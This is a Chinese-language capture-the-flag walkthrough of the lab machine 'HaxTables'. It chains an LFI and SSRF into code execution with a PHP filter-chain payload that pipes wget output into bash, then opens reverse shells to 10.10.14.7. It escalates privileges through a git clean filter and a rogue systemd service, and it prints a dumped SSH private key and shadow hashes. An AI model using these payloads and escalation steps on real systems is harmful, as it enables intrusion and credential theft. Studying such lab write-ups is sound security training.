基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ nmap -sC -sV -Pn 10.10.11.198
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-02 13:38 CST
Nmap scan report for 10.10.11.198
Host is up (0.096s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
|_  256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: HaxTables
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.02 seconds

80

API中得到域名信息:

子域名扫描

根据得到的域名格式添加hosts,继续探测子域名:

1
10.10.11.198 haxtables.htb api.haxtables.htb

发现另一个image:

1
2
3
4
ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://haxtables.htb/" -H 'Host: FUZZ.haxtables.htb' -fs 1999

api                     [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 111ms]
image                   [Status: 403, Size: 284, Words: 20, Lines: 10, Duration: 95ms]

image.haxtables.htb

添加hosts,直接访问是403:

api.haxtables.htb

根据给出的api调用代码调用api,发现一个读取远程文件的调用方式,这里可以LFI:

LFI

image .git

一步步读文件,utils里发现git:

1
2
3
file:///var/www/html/index.php
file:///var/www/image/index.php
file:///var/www/image/utils.php

image.haxtables.htb

通过git dump代码,但因为image的403限制,需要改下工具代码:

修改后的版本:

然后dump git信息:

1
./gitdumper.sh http://image.haxtables.htb/.git/ image_git_dump

git信息的到的一些文件名,继续使用前面的LFI读代码:

actions/action_handler.php

action_handler中发现LFI:

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php

include_once 'utils.php';

if (isset($_GET['page'])) {
    $page = $_GET['page'];
    include($page);

} else {
    echo jsonify(['message' => 'No page specified!']);
}

?>

handler.php

主站的handler中发现SSRF,接收到的uri_path会进入make_api_call,拼接在中间,所以也需要处理一下:

1
2
file:///var/www/html/handler.php
file:///var/www/api/utils.php

SSRF + LFI

所以可以通过handler的SSRF去调用image的LFI:

LFI to RCE

参考资料,和Pollution那台类似:

1
2
3
4
# m
bash -i >& /dev/tcp/10.10.14.7/4444 0>&1

python3 php_filter_chain_generator.py --chain '<?=`wget -O - 10.10.14.7/m|bash`?>'

然后替换page参数,得到shell:

svc

得到的www shell可以以svc用户权限运行git-commit.sh:

根据代码,用于git commit,可以通过附加Attribute执行其他操作:

我们可以在/var/www/image文件夹中初始化一个新的版本库,为所有.php文件设置缩进过滤器,设置一个运行bash文件的命令来生成反向shell,最后,以svc用户身份运行git-commit.sh文件。

1
2
3
4
5
6
7
8
9
10
11
#/tmp/shell
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.7/4444 0>&1

chmod +x /tmp/shell

cd /var/www/image
git init
echo '*.php filter=indent' > .git/info/attributes
git config filter.indent.clean /tmp/shell
sudo -u svc /var/www/image/scripts/git-commit.sh

user flag

svc用户目录里可以获取私钥方便后续操作:

svc_id_rsa

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

提权 & root flag

可以重启任意服务,那就是自己创建一个服务利用了

1
2
3
4
5
6
7
echo '[Service]
Type=oneshot
ExecStart=bash /tmp/shell
[Install]
WantedBy=multi-user.target' > /etc/systemd/system/root.service

sudo systemctl restart root

shadow

1
2
root:$y$j9T$YrcgmNEZARoBVHavwBOPQ/$wIZaX9iidgZlQcbd8FsfhAK4e9f6CCS0R8zTG7iGZWC:19307:0:99999:7:::
svc:$y$j9T$T1FiJZK9ftARU8F2cRXIo/$l4ru4RucHv80YP2Nv2KwwZbJmem.ongM5S8FbfbOTp9:19307:0:99999:7:::

参考资料